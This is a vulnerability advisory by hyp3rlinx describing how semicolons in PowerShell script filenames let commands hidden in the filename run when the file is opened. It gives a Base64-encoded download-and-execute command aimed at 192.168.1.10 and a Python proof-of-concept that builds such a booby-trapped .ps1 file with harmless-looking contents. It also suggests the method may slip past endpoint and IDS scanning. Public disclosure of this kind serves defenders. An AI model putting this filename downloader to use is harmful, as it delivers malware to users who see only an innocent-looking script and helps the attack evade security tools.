[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security
[Vendor]
www.microsoft.com
[Product]
Windows PowerShell
Windows PowerShell is a Windows command-line shell designed especially for
system administrators.
PowerShell includes an interactive prompt and a scripting environment that can
be used independently or in combination.
[Vulnerability Type]
Unsanitized Filename Command Execution
[CVE Reference]
N/A
[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named
scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the
filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself without
the need for a second file.
For trojan files it doesn't need to be another PowerShell script and can be one
of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute
"hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the
vulnerably named script.
However, when such scripts are run from PowerShells shell and not "cmd.exe" the
"&" (call operator) will block our exploit from working.
Still, if the has user enabled ".ps1" scripts to open with PowerShell as its
default program, all it takes is double click the file to trigger
the exploit and the "& call operator" will no longer save you. Also, if the
user has not enabled PowerShell to open .ps1 scripts
as default; then running the script from cmd.exe like: c:\>powershell
"\Hello;World.ps1" will also work without dropping into the PowerShell shell.
My PoC will download a remote executable save it to the victims machine and
then execute it, and the PS files contents are irrelevant.
Also, note I use "%CD" to target the current working directory where the vicitm
has initially opened it, after it calls "iwr" (invoke-webrequest)
abbreviated for space then it sleeps for 2 seconds and finally executes.
C:\>powershell
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
This can undermine the integrity of PowerShell as it potentially allows
unexpected code execution; even when the scripts contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that may
look at the contents or header of a file but not its filename where are
commands can be stored.
For this to work the user must have enabled PowerShell as its default program
when opening ".ps1" files.
First, we create a Base64 encoded filename for obfuscation; that will download
and execute a remote executable named in this case "n.exe".
c:\>powershell
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell
iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
Give the PS script a normal begining name, then separate commands using ";"
semicolon e.g.
Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
Create the executable without a file extension to save space for the filename
then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.
Host the executable on web-server or just use python -m SimpleHTTPServer 80 or
whatever.
Double click to open in PowerShell watch the file get downloaded saved and
executed!
My example is used as a "filename embedded downloader", but obviously we can
just call other secondary trojan files of various types in the same directory.
Note: User interaction is required, and obviously running any random PS script
is dangerous... but hey we looked at the file content and it simply printed a
string!
[Exploit / PoC]
from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute
malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================
def parse_args():
parser.add_argument("-i", "--ipaddress", help="Remote server to download
and exec malware from.")
parser.add_argument("-m", "--local_malware_name", help="Name for the
Malware after downloading.")
parser.add_argument("-r", "--remote_malware_name", help="Malwares name on
remote server.")
return parser.parse_args()
def main(args):
PSEmbedFilenameMalwr=""
if args.ipaddress:
PSEmbedFilenameMalwr = "powershell iwr
"+args.ipaddress+"/"+args.remote_malware_name+" -O
%CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
def create_file(payload):
f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
f.write("Write-Output 'Have a nice day!'")
f.close()
if __name__=="__main__":
parser = argparse.ArgumentParser()
PSCmds = main(parse_args())
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
create_file(PSCmds)
print "PowerShell - Unsantized Filename Command Execution File created!"
print "By hyp3rlinx"
[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: July 20, 2019
MSRC "does not meet the bar for security servicing" : July 23, 2019
August 1, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
